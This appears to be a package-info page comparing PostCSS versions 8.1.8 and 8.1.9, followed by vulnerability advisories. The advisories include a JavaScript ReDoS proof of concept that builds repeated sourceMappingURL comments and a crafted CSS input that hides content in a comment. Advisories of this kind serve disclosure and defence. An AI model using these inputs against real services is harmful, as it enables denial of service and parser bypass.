PostCSS version 8.1.9 arrives as a minor update following version 8.1.8, bringing with it refined tooling for CSS transformation using JavaScript plugins. Both versions maintain the same core mission: empowering developers to manipulate and enhance CSS with precision. Key dependencies like Colorette for colorful console output and Source Map remain consistent, ensuring a smooth developer experience during debugging and build processes.
However, subtle but significant changes make 8.1.9 noteworthy. One key difference lies in the updated dependency on "nanoid", moving from version 3.1.16 to 3.1.18. Nanoid is a small, secure, URL-friendly unique string ID generator, often used for creating unique identifiers within PostCSS plugins. While seemingly minor, this update likely addresses security vulnerabilities or performance improvements within the nanoid library itself.
Another change is the replacement of "line-column" dependency on the version 8.1.8 with "vfile-location" dependency on the version 8.1.9. This suggests a shift in how PostCSS handles locating specific lines and columns within source files. "vfile-location" is likely to provide a more robust or feature-rich approach to source file navigation, potentially improving error reporting and source map accuracy. This update can lead to more precise debugging support for plugin authors and users of PostCSS and greater reliability in identifying the exact location of issues within CSS stylesheets.
The release date differential (Nov 21st for 8.1.9 vs. Nov 19th for 8.1.8) reveals rapid iteration, indicating an active development cycle focused on continuous improvement. Choosing the latest version (8.1.9) provides developers with the most up-to-date features, bug fixes, and security enhancements, ensuring optimal performance and stability in their CSS processing workflows.
All the vulnerabilities related to the version 8.1.9 of the package
Regular Expression Denial of Service in postcss
The npm package postcss from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.